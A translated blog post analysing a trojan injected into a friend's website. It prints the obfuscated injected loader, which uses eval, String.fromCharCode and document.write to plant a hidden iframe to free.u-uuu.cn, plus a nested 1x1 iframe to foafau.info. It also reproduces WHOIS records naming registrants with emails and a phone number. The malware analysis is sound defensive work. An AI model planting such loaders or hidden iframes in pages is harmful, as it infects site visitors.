First published on my blog:
http://www.areway.cn/?p=175

Over the weekend, as soon as I got online, 鸭子 pinged me on QQ saying his site had been hit with a trojan injection (挂马). I didn't think much of it and just opened the link directly; here is the page source I captured:
<script>t='60,105,102,114,97,109,101,32,115,114,99,61,104,116,116,112,58,47,47,102,114,101,101,46,117,45,117,117,117,46,99,110,47,101,114,114,111,114,46,104,116,109,32,119,105,100,116,104,61,49,48,48,32,104,101,105,103,104,116,61,48,62,60,47,105,102,114,97,109,101,62';t=eval('String.fromCharCode('+t+')');document.write(t);</script>
<script>t='60,105,102,114,97,109,101,32,115,114,99,61,104,116,116,112,58,47,47,102,114,101,101,46,117,45,117,117,117,46,99,110,47,101,114,114,111,114,46,104,116,109,32,119,105,100,116,104,61,49,48,48,32,104,101,105,103,104,116,61,48,62,60,47,105,102,114,97,109,101,62';t=eval('String.fromCharCode('+t+')');document.write(t);</script>
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<!-- Published By Newasp.cc 2007-12-7-18:03:23 -->
<meta http-equiv="Content-Type" content="text/html; charset=gb2312" />
<title>首页 - 爱生活家庭网
At the top there is a script whose payload is a decimal-encoded field. Roughly, it stores all the character codes in the variable t, decodes them with String.fromCharCode, and finally uses document.write(t) to write the resulting string into the page.
After converting the string, the content is roughly the following (click it at your own risk):
<script>t='<iframe src=http://free.u-uuu.cn/error.htm width=………
Looking up the details of the domain u-uuu.cn:
Domain Name: u-uuu.cn
ROID: 20070901s10001s64972306-cn
Domain Status: ok
Registrant Organization: 王雷
Registrant Name: 王雷
Administrative Email: czlovexs@126.com
Sponsoring Registrar: 北京万网志成科技有限公司
Name Server: ns.yovole.com
Name Server: ns1.yovole.com
Registration Date: 2007-09-01 17:54
Expiration Date: 2008-09-01 17:54
Finally I pinged the address; nothing came back....

Continued the analysis in a virtual machine: opened the link above in IE... viewed the source... and right away there is another nested one.

<iframe src=http://www.foafau.info/ms15.htm width=1 height=1></iframe>
<script language="javascript" src="http://count43.51yes.com/click.aspx?id=4333375720&logo=6"></script>
This domain is most likely the trojan author's own:
Details for foafau.info:
Domain ID:D22418703-LRMS
Domain Name:FOAFAU.INFO
Created On:20-Nov-2007 16:05:42 UTC
Last Updated On:20-Nov-2007 16:05:44 UTC
Expiration Date:20-Nov-2008 16:05:42 UTC
Sponsoring Registrar:GoDaddy.com Inc. (R171-LRMS)
Status:CLIENT DELETE PROHIBITED
Status:CLIENT RENEW PROHIBITED
Status:CLIENT TRANSFER PROHIBITED
Status:CLIENT UPDATE PROHIBITED
Status:TRANSFER PROHIBITED
Registrant ID:GODA-040110615
Registrant Name:liu hong
Registrant Organization:
Registrant Street1:beijing
Registrant Street2:
Registrant Street3:
Registrant City:beijing
Registrant State/Province:
Registrant Postal Code:100000
Registrant Country:CN
Registrant Phone:+86.860108888777
Registrant Phone Ext.:
Registrant FAX:
Registrant FAX Ext.:
Registrant Email:bbbshiji@163.com
Admin ID:GODA-240110615
Admin Name:liu hong
Admin Organization:
Admin Street1:beijing
Admin Street2:
Admin Street3:
Admin City:beijing
Admin State/Province:
Admin Postal Code:100000
Admin Country:CN
Admin Phone:+86.860108888777
Admin Phone Ext.:
Admin FAX:
Admin FAX Ext.:
Admin Email:bbbshiji@163.com
Billing ID:GODA-340110615
Billing Name:liu hong
Billing Organization:
Billing Street1:beijing
Billing Street2:
Billing Street3:
Billing City:beijing
Billing State/Province:
Billing Postal Code:100000
Billing Country:CN
Billing Phone:+86.860108888777
Billing Phone Ext.:
Billing FAX:
Billing FAX Ext.:
Billing Email:bbbshiji@163.com
Tech ID:GODA-140110615
Tech Name:liu hong
Tech Organization:
Tech Street1:beijing
Tech Street2:
Tech Street3:
Tech City:beijing
Tech State/Province:
Tech Postal Code:100000
Tech Country:CN
Tech Phone:+86.860108888777
Tech Phone Ext.:
Tech FAX:
Tech FAX Ext.:
Tech Email:bbbshiji@163.com
Name Server:NS27.DOMAINCONTROL.COM
Name Server:NS28.DOMAINCONTROL.COM
Next I downloaded the code from each of the files:
Going through it step by step..

It is all decimal-encoded code as well; I couldn't be bothered to analyze it any further. Anyone who enjoys this kind of thing is welcome to keep going.